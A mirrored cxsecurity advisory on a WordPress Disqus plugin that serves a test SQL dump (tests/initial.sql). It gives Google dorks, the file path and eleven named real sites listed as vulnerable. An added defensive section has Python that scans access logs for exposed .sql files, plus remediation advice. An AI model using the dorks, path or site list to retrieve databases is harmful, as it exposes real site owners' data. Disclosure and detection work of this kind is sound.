WordPress Disqus Comment System Plugins 2.87 Database Backup Disclosure

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018120087

Below is a copy:

WordPress Disqus Comment System Plugins 2.87 Database Backup Disclosure
#################################################################################################

# Exploit Title : WordPress Disqus Comment System Plugins 2.87 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 08/12/2018
# Vendor Homepage : disqus.com ~ wordpress.org/plugins/disqus-comment-system/
# Software Download Link : github.com/clearhead/clearhead.me/archive/master.zip
+ github.com/clearhead/clearhead.me/blob/master/wp-content/plugins/disqus-comment-system/tests/initial.sql
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 2.87 and 3.0
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/disqus-comment-system/tests/''
intext:''Greyzed Theme created by The Forge Web Creations. Powered by WordPress.''
intext:''© 2008 - 2018 Grazitti Interactive. All rights reserved''
intext:''HyTrade Marketing & Comunicação © 2017 | Todos direitos reservados''
intext:''© 2018 Chainbit, LLC. All rights reserved''
intext:''Copyright 2015 / CIP Data Collection Ltd Company No. 10462735''
intext:''© 2017 Longlife Magazine - All Rights Reserved.''
intext:''© Copyright Feira Cultural 2017. Todos os direitos reservado''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ]
CWE-200 - [ Information Exposure ]
CWE-530 - [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

-- MySQL dump 10.13  Distrib 5.1.48, for apple-darwin10.4.0 (i386)
--
-- Host: localhost    Database: wordpress
-- ------------------------------------------------------
-- Server version	5.1.48

#################################################################################################

# Admin Panel Login Path : 

/wp-login.php

# Exploit : 

/wp-content/plugins/disqus-comment-system/tests/initial.sql
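The issue above is a SQL test fixture shipped inside the plugin directory and served as a static file by the web server. The following is an added example for site owners and is not part of the advisory or of the plugin: it (1) scans web-server access-log lines for successfully served `.sql` files under `wp-content`, and (2) recognises the `-- MySQL dump` header quoted above, so an administrator can confirm whether a host they manage still serves the file. The log lines, the IP addresses and the helper names are constructed for this example; `check_own_site` is meant to be pointed only at a host you administer.

```python
"""Defender-side checks for SQL backup / fixture files exposed under wp-content.

Added example, not part of the original advisory. Log lines below are constructed.
"""
import re
import urllib.request
from urllib.error import HTTPError, URLError

# Apache/nginx "combined" log format: client ident user [time] "request" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# A .sql (or compressed .sql) file anywhere below a wp-content directory; query string ignored.
SQL_PATH_RE = re.compile(
    r'^/(?:[^?]*/)?wp-content/.*\.(?:sql|sql\.gz|sql\.zip)(?:\?.*)?$', re.I
)

# First header line of a mysqldump file, as quoted in the advisory.
DUMP_SIGNATURE = "-- MySQL dump"

# Constructed sample log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '203.0.113.5 - - [08/Dec/2018:10:15:01 +0000] "GET /wp-content/plugins/disqus-comment-system/tests/initial.sql HTTP/1.1" 200 48213 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [08/Dec/2018:10:15:02 +0000] "GET /wp-login.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [08/Dec/2018:10:16:30 +0000] "GET /wp-content/plugins/disqus-comment-system/tests/initial.sql HTTP/1.1" 403 199 "-" "curl/7.58"',
    '198.51.100.9 - - [08/Dec/2018:10:17:00 +0000] "GET /blog/wp-content/uploads/backup.sql.gz HTTP/1.1" 200 1048576 "-" "python-requests/2.20"',
]


def scan_access_log(lines):
    """Return (ip, path, status, size) for every SQL file under wp-content that was
    actually served (HTTP 200 with a non-empty body). Blocked requests (403/404)
    are ignored here; they show the hardening is working."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not SQL_PATH_RE.match(m["path"]):
            continue
        status = int(m["status"])
        size = 0 if m["size"] == "-" else int(m["size"])
        if status == 200 and size > 0:
            hits.append((m["ip"], m["path"], status, size))
    return hits


def looks_like_mysql_dump(body):
    """True if the response body starts with the mysqldump header the advisory shows."""
    return body[:512].lstrip().startswith(DUMP_SIGNATURE)


def check_own_site(base_url,
                   path="/wp-content/plugins/disqus-comment-system/tests/initial.sql",
                   timeout=10):
    """Fetch the fixture path on a host you administer.
    Returns 'exposed' (served and looks like a dump), 'served-not-dump',
    'blocked' (4xx/5xx) or 'unreachable'."""
    url = base_url.rstrip("/") + path
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            body = resp.read(4096).decode("utf-8", errors="replace")
    except HTTPError:          # 403 / 404 etc.: the file is not being served
        return "blocked"
    except URLError:           # DNS / connection failure
        return "unreachable"
    return "exposed" if looks_like_mysql_dump(body) else "served-not-dump"


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("served SQL file:", hit)
```

In practice the log scan is run over the real access log (for example by piping `tail -f` into it) and any hit is treated as a confirmed disclosure, since a 200 with a body means the dump left the server. The corresponding fix is to remove the `tests/` directory from the deployed plugin (or upgrade) and to deny `.sql` files under `wp-content` at the web-server level, after which `check_own_site` should report `blocked`.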

#################################################################################################

# Example Vulnerable Sites =>

[+] therussianlinesman.com/blog/wp-content/plugins/disqus-comment-system/tests/initial.sql

[+] hytrade.com.br/wp-content/plugins/disqus-comment-system/tests/initial.sql

[+] grazitti.com/wp-content/plugins/disqus-comment-system/tests/initial.sql

[+] paulsforza.com/wordpress/wp-content/plugins/disqus-comment-system/tests/initial.sql

[+] combbo.com.br/cmb/wp-content/plugins/disqus-comment-system/tests/initial.sql

[+] uof7.com/wp-content/plugins/disqus-comment-system/tests/initial.sql

[+] ecommerceandb2b.com/b2bblog/wp-content/plugins/disqus-comment-system/tests/initial.sql

[+] cipmetering.com/wp-content/plugins/disqus-comment-system/tests/initial.sql

[+] soogran.com/wp-content/plugins/disqus-comment-system/tests/initial.sql

[+] longlifemagz.com/wp-content/plugins/disqus-comment-system/tests/initial.sql

[+] feiracultural.art.br/wp-content/plugins/disqus-comment-system/tests/initial.sql

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################
